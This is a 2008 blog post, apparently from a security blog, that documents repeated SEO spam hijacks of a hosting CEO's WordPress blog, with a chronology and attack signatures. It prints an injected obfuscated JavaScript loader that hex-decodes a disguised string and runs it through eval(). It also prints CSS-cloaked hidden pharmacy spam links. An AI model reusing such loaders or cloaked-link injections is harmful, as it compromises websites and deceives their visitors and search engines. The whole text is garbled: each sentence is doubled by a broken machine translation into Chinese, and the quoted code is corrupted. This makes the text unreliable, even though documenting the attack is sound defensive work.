Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II 马特希亚bluehost hostmonster首席执行官砍死再次-罢工二

    • Jan 一月
    • 31 31

    Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II 马特希亚bluehost hostmonster首席执行官砍死再次-罢工二

    Posted by chaoskaizer.myopenid.com 6 months, 1 week ago . 张贴chaoskaizer.myopenid.com 6个月,一周前

    Filed under Security ¸ WordPress & vulnerability .提起下安全 ¸ 在WordPress 脆弱性

    在WordPress - blackhat -西区spam.png形象chaoskaizer Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com .被砍死的徐垃圾邮件发送者是好像每年的事件在mattheaton.com Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record).马特的WordPress博客是第一次被劫2月前对2007年11月26日(根据我的记录) 。 You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked .您可以digg我刚才的职位→ 马特希亚bluehost hostmonster首席执行官官方博客砍死

    It’sa big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) .这是大尴尬bluehosthostmonster主办,以他们的行政总裁的博客正在spamride每年(自2007年) 。 Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.钻井马特希亚的不良广告wont解决blackhat垃圾邮件的问题,我会离开的细节部分,以我的读者猜测。

    Mattheaton Goro Spam Chronology mattheaton戈罗垃圾邮件年表

    Date日期 Event事件
    Jul 2007 2007年7月 Google PR 7 Google的公关7
    Aug 2007 2007年8月 Stop being Index by archive.org停止指数由archive.org
    Nov 28th 2007 2007年11月28日 Wordpress.net.in Goro Spam on wp_footer backlink to howardowens.com wordpress.net.in戈罗垃圾邮件wp_footer反向,以howardowens.com
    Dec 4th 2007 2007年12月4日 Unknown Goro Spam on wp_head backlink to tangonoticias.com未知戈罗垃圾邮件wp_head反向,以tangonoticias.com
    Dec 11th 2007 2007年12月11日 Wordpress Upgrade to version 2.3.1在WordPress升级到版本2.3.1
    Jan 16th, 2008 2008年1月16日 Google PR5 Google的pr5
    Jan 26th, 2008 2008年1月26日 Unknown Blackhat SEO spam on wp_head backlink to brainwave-india.com未知blackhat徐垃圾邮件wp_head反向,以脑波- india.com
    Feb 3rd, 2008 2008年2月3日 Unknown Blackhat SEO spam on wp_head backlink to thinkingphp.org未知blackhat徐垃圾邮件wp_head反向,以thinkingphp.org
    Feb 8th, 2008 2008年2月8日 Unknown uusing CSS cloacking method on wp_head backlink to zoorender.com未知uusing的CSS cloacking方法对wp_head反向,以zoorender.com
    Feb 13th, 2008 2008年2月13日 Unknown using CSS cloacking method on wp_head backlink to blog.jensfranke.com未知使用的CSS cloacking方法对wp_head反向,以blog.jensfranke.com
    Feb 20th, 2008 2008年2月20日 Unknown using CSS cloacking method on wp_head backlink to entrepreneur27.org未知使用的CSS cloacking方法对wp_head反向,以entrepreneur27.org
    Feb 24th, 2008 2008年2月24日 Unknown using CSS cloacking method on wp_head backlink to latenightpc.com未知使用的CSS cloacking方法对wp_head反向,以latenightpc.com
    Feb 26th, 2008 2008年2月26日 Unknown using CSS cloacking method on wp_head backlink to communitynext.com未知使用的CSS cloacking方法对wp_head反向,以communitynext.com

    Wordpress.net.in GORO Spam Pattern wordpress.net.in戈罗垃圾邮件模式

    • All the infected sites will stop being index by archive.org few months before the spam started.所有受感染的网站将被停止指数由archive.org之前的几个月,垃圾邮件的开始。
    • From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)从2007年11月至2008年1月(右后, Google的大规模P3的德级发烧) -b lackhat戈罗垃圾邮件发送者的目标是p r6& p r7网站上运行的W ordPress( 2 .3.1以下) ,以及在一些罕见病例( t angonoticias.com) j oomla细胞质雄性不育( 1.0.x )
    • I categorize this blackhat method as Sybil Attack i分类此blackhat方法sybil攻击

      A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. 1 sybil攻击是其中之一,在攻击者的声誉,破坏了制度,造就一大批匿名的实体,并利用它们争取一个大得不成比例的影响力。 A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.声誉制度的脆弱性,以1 sybil攻击视乎如何便宜sybils可以产生,在何种程度上的声誉,系统接受输入的实体不具备连锁的信任联系起来,到一个受信任的实体,以及是否声誉系统对待所有实体相同。

      - Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) -d erank和操纵他们的受害者东道国提高他们的药剂制品在G oogle本地搜索索引(游戏l ocalrank为更好地s erp)

    • Goro signatures:戈罗签名:
      1. html div with id “goro”学的HTML ID为“戈罗” 
         <div id="goro"> <a href=">...</a> </div> <div id="goro">的<a href="> ...</ 1 > < /学>
      2. javascript function name “getme()” JavaScript函数的名称“ getme ( ) ” 
         <script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (  idx; idx < len; idx  = 2,i  ){ var ch = parseInt(str.substr(idx, 2), 16); new_str  = String.fromCharCode((ch   i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script> <script type="text/javascript">功能getme (个STR ) (无功_ = str.indexof ('?');如果( _ == -1 )返回个STR ;无功伦= str.length ;无功new_str = ' ' ;无功= 1 ; (     _ ; _ <伦; _   = 2 ,我    ) (无功的CH = parseint ( str.substr ( _ , 2 ) , 16 ) ; new_str   = string.fromcharcode ( (甲烷 一) % 256 ) ; ) eval ( new_str ) ; ) getme ( ' http://pagead2.googlesyndication.com/pagead/show_ads.js?636d6071685f676c255d5a68385e565d545c612e64334d100e4d545652090a0e5252564840083d414a4641354c0ff83e3e3c32f306 ' ) ; < /脚本>
      3. Output spam on WordPress wp_footer & wp_head hook输出垃圾邮件的WordPress wp_footer & wp_head钩

    Blackhat SEO Spamdexing Google Local Search Index blackhat徐spamdexing Google本地搜索指数

    The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.下面的图解释blackhat徐spamdexing方法操纵Google本地serp 。

    View Spamdexing Google Local Search Image鉴于spamdexing Google本地搜索的形象

    ScreenGrab screengrab

    Recent Update最近更新

    • Feb 1, 2008 - we send a letter to regarding this issue. 2008年2月1日 -我们写信给m 于这个问题。 Still waiting for his replies仍在等待他的答复
    • Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer . 2008年2月3日 -b lackhat戈罗垃圾邮件发送者改变他们的目标s pamhost从h ttp://www.brainwave-india.com( p r6) h ttp://www.thinkingphp.org( p r6) -费利克斯ge isendörfer。 
       <div id="goro"><a href="http://www.thinkingphp.org/?read=796 ... prescription</a></div><script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (  idx; idx < len; idx  = 2,i  ){ var ch = parseInt(str.substr(idx, 2), 16); new_str  = String.fromCharCode((ch   i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script> <div id="goro"> <一href = “ http://www.thinkingphp.org/?read=796 ...处方< /一> < /学> <script type="text/javascript">功能getme (个STR ) (无功_ = str.indexof ('?');如果( _ == -1 )返回个STR ;无功伦= str.length ;无功new_str = '' ;无功= 1 ; (   _ ; _ <伦; _   = 2 ,我    ) (无功的CH = parseint ( str.substr ( _ , 2 ) , 16 ) ; new_str   = string.fromcharcode (型( CH  一) % 256 ) ; ) eval ( new_str ) ; ) getme ( ' http://pagead2.googlesyndication.com/pagead/show_ads.js?636d6071685f676c255d5a68385e565d545c612e64334d100e4d545652090a0e5252564840083d414a4641354c0ff83e3e3c32f306 ' ) ; < /脚本>

      thinkingphp.org blog is running on WordPress 2.3.2 . thinkingphp.org博客上运行的WordPress 2.3.2 We send him email regarding the Goro Spam hijack .我们给他的电子邮件就戈罗垃圾邮件劫持

    • Feb 8th 2008 , There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6) . 2008年2月8日 ,是没有签名的戈罗垃圾邮件(标记与编号戈罗)对马特的博客该blackhat是现在使用内置的CSS的立场溢出隐藏垃圾邮件的链接↓重定向到zoorender.com ( pr6 ) 
       <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.zoorender.com/?discount=1776">buying .. <div style="left: -2227px; position: absolute; top: -3337px">的<a href="http://www.zoorender.com/?discount=1776">购买.. </div> < /学>
    • Feb 13th 2008 , Same methods as above (inline css cloacking) . 2008年2月13日 ,同样的方法如上(内嵌的CSS cloacking ) 。
      • HTML Code shown to a Regular Browser → 32,246 characters HTML代码显示,经常浏览器→ 32246字
      • HTML Code shown to Google Bot → 34,646 characters HTML代码表明, Google的建造,营运及移交→ 34646字

      redirect to blog.jensfranke.com (PR7) .重定向到blog.jensfranke.com ( pr7 ) 

       <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://blog.jensfranke.com/?read=606">buy generic fi <div style="left: -2227px; position: absolute; top: -3337px">的<a href="http://blog.jensfranke.com/?read=606">购买通用Fi的
    • Feb 20th 2008 , CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6) . 2008年2月20日 ,以CSS cloacking重定向到http://www.entrepreneur27.org/ ( pr6 ) 
       <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.entrepreneur27.org/?more=1591">bad side effects of viagra</a>&nbsp;<a href="http://www.entrepreneur27.org/?more=1592"> ... <div style="left: -2227px; position: absolute; top: -3337px">的<a href="http://www.entrepreneur27.org/?more=1591">不良的副作用,威而钢< /一>的<a href="http://www.entrepreneur27.org/?more=1592"> ... </div> < /学>
    • Feb 24th 2008 , CSS Cloacking redirect to http://www.latenightpc.com (PR5) . mattheaton-com-022408-source.txt 2008年2月24日 ,以CSS cloacking重定向到http://www.latenightpc.com ( pr5 )mattheaton - COM的022408 - source.txt
    • Feb 26th 2008 , CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6) . mattheaton-com-022608-source.txt 2008年2月26日 ,以CSS cloacking重定向到http://www.communitynext.com/的WordPress 2.3.3 ( pr6 )mattheaton - COM的022608 - source.txt

    Related Posts相关文章

    External Links外部链接

    About the Author关于作者

    Tags: 标签:
    • January 31, 2008 at 5:07 pm 2008年1月31日在下午5时07分
    • March 4, 2008 at 5:42 pm 2008年3月4日在下午5时42分
    • 0.3
    • url网址

    • One Response toMatt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II 1回应马特希亚bluehost hostmonster首席执行官砍死再次-罢工Ⅱ ”

      Trackback URL: 跟踪网址: Use the TrackBack url ↑ to ping this article. 使用跟踪RUI ↑ ,以平这篇文章。 If your blog does not support Trackbacks you might want to leave a comment instead. 如果您的博客不支持trackbacks您可能会想要离开的评论。
        • permalink 永久
          Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II staygolinks.com 5 months, 4 weeks ago 3 url 马特希亚bluehost hostmonster首席执行官砍死再次-罢工第二s taygolinks.com5 个月, 4周前3

          [...] on that is the blog of Matt Heaton, the Bluehost and Hostmonster CEO. [ … … ]对,这是博客的马特希亚, bluehost和hostmonster的CEO 。 The Kakkoi website provides a good account of what has been happening there.该kakkoi网站提供了一个良好的交代什么已发生的事情。 At the time of writing this post, the blog is still hacked although you would not know by looking [...]在当时的写本后,博客仍然是黑客入侵,虽然你不会知道看[ … … ]

          • 1 pingback(s) þ www.staygolinks.com on WordPress 2.3.3 1 pingback ( ) þ www.staygolinks.com就在WordPress 2.3.3

    RSS feed for comments in this post RSS馈送的意见,在这个职位

    "write as if you were talking to a good friend (in front of your mother)." “写的,如果你谈的一个好朋友(在前面的你的母亲) ” 。

    .have your say

    Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved. 免责声明:任何内容,您后,您在此授予kakkoi该免版税的,不可撤销的,永久的,排他性和完全转授的许可使用,复制,修改,改编,出版,翻译,创作衍生作品,分发,执行和显示这些内容的全部或部分,世界各地,并把它在其他工程,以任何形式,媒体或技术,现在已知或以后开发的 一些版权所有。